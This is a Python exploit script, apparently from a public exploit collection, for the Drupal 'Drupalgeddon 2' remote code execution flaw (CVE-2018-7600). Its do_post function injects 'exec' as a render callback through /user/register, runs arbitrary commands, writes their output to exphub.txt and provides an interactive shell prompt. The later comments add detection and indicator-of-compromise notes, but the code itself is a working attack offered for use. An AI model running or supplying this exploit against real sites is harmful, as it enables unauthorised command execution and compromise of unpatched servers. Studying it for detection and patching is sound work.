#!/usr/bin/python3
# coding:utf-8
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests
import json

if len(sys.argv)!=2:
    # Usage banner: shown when the single positional argument (target base URL)
    # is missing; the process exits here without touching the network.
    _usage_lines = (
        '+----------------------------------------------------------------------+',
        '+ DES: by zhzyker as https://github.com/zhzyker/exphub                 +',
        '+      Drupal Drupalgeddon 2 远程代码执行 CVE-2018-7600                +',
        '+----------------------------------------------------------------------+',
        '+ USE: python3 <filename> <url>                                        +',
        '+ EXP: python3 cve-2018-7600_cmd.py http://1.1.1.1:8080                +',
        '+ VER: Drupal 6.x                                                      +',
        '+      Drupal 7.x < 7.58                                               +',
        '+      Drupal 8.3 < 8.3.9                                              +',
        '+      Drupal 8.4 < 8.4.6                                              +',
        '+      Drupal 8.5 < 8.5.1                                              +',
        '+----------------------------------------------------------------------+',
        '+ DES: Shell仅能回显一行代码，多行代码结果查看http://xxxx/exphub.txt   +',
        '+----------------------------------------------------------------------+',
    )
    for _line in _usage_lines:
        print(_line)
    sys.exit()

url=sys.argv[1]   # target base URL (scheme://host[:port]); every path below is appended with a leading '/'
#cmd=sys.argv[2]
cmd="whoami"      # dead value: the prompt loop rebinds `cmd` before any use, and do_post's parameter shadows it

proxies = {}      # forwarded to every requests call; empty dict means a direct connection
verify = True     # TLS certificate validation stays enabled on every request (requests `verify=`)

def do_post(cmd):
    """Send one shell command through the CVE-2018-7600 (Drupalgeddon 2) render
    callback injection and print the first line of its output.

    Reads the module globals ``url``, ``proxies`` and ``verify``.

    Request shape (this is also what a detection rule should key on): a POST to
    ``/user/register`` whose query string carries
    ``element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax``
    and whose form body sets the renderer callback ``mail[#post_render][]`` to
    ``exec`` with the command in ``mail[#markup]``.  Web-server/WAF logs matching
    that query string, or ``#post_render``/``#markup`` form keys, flag this
    technique regardless of the command used; the fix is the patched releases
    listed in the usage banner (7.58 / 8.3.9 / 8.4.6 / 8.5.1).

    Args:
        cmd: command string embedded verbatim in ``mail[#markup]``; no quoting or
            validation happens here.

    Target-side artifact: the command output is also written to ``exphub.txt`` in
    the Drupal document root (``| tee exphub.txt``), a durable on-disk indicator
    of compromise for responders.

    Raises:
        requests.RequestException on transport failure; ValueError/IndexError/
        KeyError when the reply is not the expected JSON array with a ``data``
        key — there is no error handling in this function.
    """
    target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
    # 'mail[#post_render][]': 'exec' is the injected renderer callback; '#markup' is its argument.
    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ''+cmd+' | tee exphub.txt'}
    r = requests.post(target, proxies=proxies, data=payload, verify=verify)
    # Drupal's AJAX reply is a JSON array of commands; the first entry's "data"
    # holds the rendered output, followed by page markup starting at "<span".
    command = r.json()[0]["data"]
    command = command.split("<span")[0]   # keep only the part before the first "<span"
    print (command)
    
# Probe for `<url>/exphub.txt`, the file do_post leaves behind via `tee`, and
# stop unless it already answers 200.  This runs before any do_post call, so it
# can only observe a file that is already present on the server; for a defender,
# a site that serves /exphub.txt has already had this tool run against it.
check = requests.get(url + '/exphub.txt', proxies=proxies, verify=verify)
if check.status_code != 200:
  # Message overstates what was tested: a missing artifact does not show the site is patched.
  sys.exit("[-] not cve-2018-7600\n")
print ('[+] '+url+'/exphub.txt\n')

# Interactive prompt: one command per line is handed to do_post.  "exit" leaves
# via the site-module builtin `exit()` (absent under `python -S`); `sys.exit(0)`
# would be the portable choice.
while 1:
    cmd = input("Shell >>> ")
    if cmd == "exit" : exit(0)
    do_post(cmd)
